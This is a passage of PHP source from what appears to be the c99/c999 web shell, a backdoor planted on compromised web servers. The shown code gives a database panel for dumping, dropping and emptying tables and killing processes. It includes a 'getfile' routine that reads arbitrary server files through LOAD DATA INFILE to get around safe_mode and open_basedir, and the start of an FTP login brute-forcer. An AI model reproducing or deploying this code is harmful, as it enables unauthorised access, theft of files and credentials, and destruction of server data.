- while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
- if (!$c) {echo "No tables found in database.";}
- }
- }
- else
- {
- ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
- $result = mysql_list_dbs($sql_sock);
- if (!$result) {echo mysql_smarterror();}
- else
- {
- ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
- $c = 0;
- $dbs = "";
- while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
- echo "<option value=\"\">Databases (".$c.")</option>";
- echo $dbs;
- }
- ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
- }
- //End left panel
- echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
- //Start center panel
- $diplay = TRUE;
- if ($sql_db)
- {
- if (!is_numeric($c)) {$c = 0;}
- if ($c == 0) {$c = "no";}
- echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
- if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
- echo "</b></center>";
- $acts = array("","dump");
- if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
- elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
- elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
- elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
- elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
- elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
- elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
- elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
- elseif ($sql_tbl_act == "insert")
- {
- if ($sql_tbl_insert_radio == 1)
- {
- $keys = "";
- $akeys = array_keys($sql_tbl_insert);
- foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
- if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
- $values = "";
- $i = 0;
- foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
- if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
- $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
- $sql_act = "query";
- $sql_tbl_act = "browse";
- }
- elseif ($sql_tbl_insert_radio == 2)
- {
- $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
- $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
- $result = mysql_query($sql_query) or print(mysql_smarterror());
- $result = mysql_fetch_array($result, MYSQL_ASSOC);
- $sql_act = "query";
- $sql_tbl_act = "browse";
- }
- }
- if ($sql_act == "query")
- {
- echo "<hr size=\"1\" noshade>";
- if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
- if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
- if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
- }
- if (in_array($sql_act,$acts))
- {
- ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
- if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
- if ($sql_act == "newtbl")
- {
- echo "<b>";
- if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
- }
- else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
- }
- elseif ($sql_act == "dump")
- {
- if (empty($submit))
- {
- $diplay = FALSE;
- echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
- echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
- $v = join (";",$dmptbls);
- echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
- if ($dump_file) {$tmp = $dump_file;}
- else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
- echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
- echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
- echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
- echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
- echo "</form>";
- }
- else
- {
- $diplay = TRUE;
- $set = array();
- $set["sock"] = $sql_sock;
- $set["db"] = $sql_db;
- $dump_out = "download";
- $set["print"] = 0;
- $set["nl2br"] = 0;
- $set[""] = 0;
- $set["file"] = $dump_file;
- $set["add_drop"] = TRUE;
- $set["onlytabs"] = array();
- if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
- $ret = mysql_dump($set);
- if ($sql_dump_download)
- {
- @ob_clean();
- header("Content-type: application/octet-stream");
- header("Content-length: ".strlen($ret));
- header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
- echo $ret;
- exit;
- }
- elseif ($sql_dump_savetofile)
- {
- $fp = fopen($sql_dump_file,"w");
- if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
- else
- {
- fwrite($fp,$ret);
- fclose($fp);
- echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
- }
- }
- else {echo "<b>Dump: nothing to do!</b>";}
- }
- }
- if ($diplay)
- {
- if (!empty($sql_tbl))
- {
- if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
- $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
- $count_row = mysql_fetch_array($count);
- mysql_free_result($count);
- $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
- $tbl_struct_fields = array();
- while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
- if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
- if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
- if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
- if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
- $perpage = $sql_tbl_le - $sql_tbl_ls;
- if (!is_numeric($perpage)) {$perpage = 10;}
- $numpages = $count_row[0]/$perpage;
- $e = explode(" ",$sql_order);
- if (count($e) == 2)
- {
- if ($e[0] == "d") {$asc_desc = "DESC";}
- else {$asc_desc = "ASC";}
- $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
- }
- else {$v = "";}
- $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
- $result = mysql_query($query) or print(mysql_smarterror());
- echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
- echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[ <b>Structure</b> ]</a> ";
- echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[ <b>Browse</b> ]</a> ";
- echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[ <b>Dump</b> ]</a> ";
- echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[ <b>Insert</b> ]</a> ";
- if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
- if ($sql_tbl_act == "insert")
- {
- if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
- if (!empty($sql_tbl_insert_radio))
- {
- }
- else
- {
- echo "<br><br><b>Inserting row into table:</b><br>";
- if (!empty($sql_tbl_insert_q))
- {
- $sql_query = "SELECT * FROM `".$sql_tbl."`";
- $sql_query .= " WHERE".$sql_tbl_insert_q;
- $sql_query .= " LIMIT 1;";
- $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
- $values = mysql_fetch_assoc($result);
- mysql_free_result($result);
- }
- else {$values = array();}
- echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
- foreach ($tbl_struct_fields as $field)
- {
- $name = $field["Field"];
- if (empty($sql_tbl_insert_q)) {$v = "";}
- echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
- $i++;
- }
- echo "</table><br>";
- echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
- if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
- echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
- }
- }
- if ($sql_tbl_act == "browse")
- {
- $sql_tbl_ls = abs($sql_tbl_ls);
- $sql_tbl_le = abs($sql_tbl_le);
- echo "<hr size=\"1\" noshade>";
- echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\"> ";
- $b = 0;
- for($i=0;$i<$numpages;$i++)
- {
- if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
- echo $i;
- if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
- if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
- else {echo " ";}
- }
- if ($i == 0) {echo "empty";}
- echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
- echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
- echo "<tr>";
- echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
- for ($i=0;$i<mysql_num_fields($result);$i++)
- {
- $v = mysql_field_name($result,$i);
- if ($e[0] == "a") {$s = "d"; $m = "asc";}
- else {$s = "a"; $m = "desc";}
- echo "<td>";
- if (empty($e[0])) {$e[0] = "a";}
- if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
- else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
- echo "</td>";
- }
- echo "<td><font color=\"green\"><b>Action</b></font></td>";
- echo "</tr>";
- while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
- {
- echo "<tr>";
- $w = "";
- $i = 0;
- foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
- if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
- echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
- $i = 0;
- foreach ($row as $k=>$v)
- {
- $v = htmlspecialchars($v);
- if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
- echo "<td>".$v."</td>";
- $i++;
- }
- echo "<td>";
- echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a> ";
- echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a> ";
- echo "</td>";
- echo "</tr>";
- }
- mysql_free_result($result);
- echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
- echo "<option value=\"\">With selected:</option>";
- echo "<option value=\"deleterow\">Delete</option>";
- echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
- }
- }
- else
- {
- $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
- if (!$result) {echo mysql_smarterror();}
- else
- {
- echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
- $i = 0;
- $tsize = $trows = 0;
- while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
- {
- $tsize += $row["Data_length"];
- $trows += $row["Rows"];
- $size = view_size($row["Data_length"]);
- echo "<tr>";
- echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
- echo "<td> <a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a> </td>";
- echo "<td>".$row["Rows"]."</td>";
- echo "<td>".$row["Type"]."</td>";
- echo "<td>".$row["Create_time"]."</td>";
- echo "<td>".$row["Update_time"]."</td>";
- echo "<td>".$size."</td>";
- echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a> </td>";
- echo "</tr>";
- $i++;
- }
- echo "<tr bgcolor=\"000000\">";
- echo "<td><center><b>»</b></center></td>";
- echo "<td><center><b>".$i." table(s)</b></center></td>";
- echo "<td><b>".$trows."</b></td>";
- echo "<td>".$row[1]."</td>";
- echo "<td>".$row[10]."</td>";
- echo "<td>".$row[11]."</td>";
- echo "<td><b>".view_size($tsize)."</b></td>";
- echo "<td></td>";
- echo "</tr>";
- echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
- echo "<option value=\"\">With selected:</option>";
- echo "<option value=\"tbldrop\">Drop</option>";
- echo "<option value=\"tblempty\">Empty</option>";
- echo "<option value=\"tbldump\">Dump</option>";
- echo "<option value=\"tblcheck\">Check table</option>";
- echo "<option value=\"tbloptimize\">Optimize table</option>";
- echo "<option value=\"tblrepair\">Repair table</option>";
- echo "<option value=\"tblanalyze\">Analyze table</option>";
- echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>";
- mysql_free_result($result);
- }
- }
- }
- }
- }
- else
- {
- $acts = array("","newdb","serverstatus","servervars","processes","getfile");
- if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
- if (!empty($sql_act))
- {
- echo "<hr size=\"1\" noshade>";
- if ($sql_act == "newdb")
- {
- echo "<b>";
- if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
- else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
- }
- if ($sql_act == "serverstatus")
- {
- $result = mysql_query("SHOW STATUS", $sql_sock);
- echo "<center><b>Server-status variables:</b><br><br>";
- echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
- while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
- echo "</table></center>";
- mysql_free_result($result);
- }
- if ($sql_act == "servervars")
- {
- $result = mysql_query("SHOW VARIABLES", $sql_sock);
- echo "<center><b>Server variables:</b><br><br>";
- echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
- while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
- echo "</table>";
- mysql_free_result($result);
- }
- if ($sql_act == "processes")
- {
- if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
- $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
- echo "<center><b>Processes:</b><br><br>";
- echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
- while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
- echo "</table>";
- mysql_free_result($result);
- }
- if ($sql_act == "getfile")
- {
- $tmpdb = $sql_login."_tmpdb";
- $select = mysql_select_db($tmpdb);
- if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
- if ($select)
- {
- $created = FALSE;
- mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
- mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
- $result = mysql_query("SELECT * FROM tmp_file;");
- if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
- else
- {
- for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
- $f = "";
- while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
- if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
- else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
- mysql_free_result($result);
- mysql_query("DROP TABLE tmp_file;");
- }
- }
- mysql_drop_db($tmpdb); //comment it if you want to leave database
- }
- }
- }
- }
- echo "</td></tr></table>";
- if ($sql_sock)
- {
- $affected = @mysql_affected_rows($sql_sock);
- if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
- echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
- }
- echo "</table>";
- }
- if ($act == "mkdir")
- {
- if ($mkdir != $d)
- {
- if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
- elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
- echo "<br><br>";
- }
- $act = $dspact = "ls";
- }
- if ($act == "ftpquickbrute")
- {
- echo "<b>Ftp Quick brute:</b><br>";
- if (!win) {echo "This functions not work in Windows!<br><br>";}
- else
- {
- function c999ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
- {
- if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
- else {$TRUE = TRUE;}
- if ($TRUE)
- {
- $sock = @ftp_connect($host,$port,$timeout);
- if (@ftp_login($sock,$login,$pass))
- {
- echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
- ob_flush();
- return TRUE;
- }
- }
- }
- if (!empty($submit))
- {
- if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
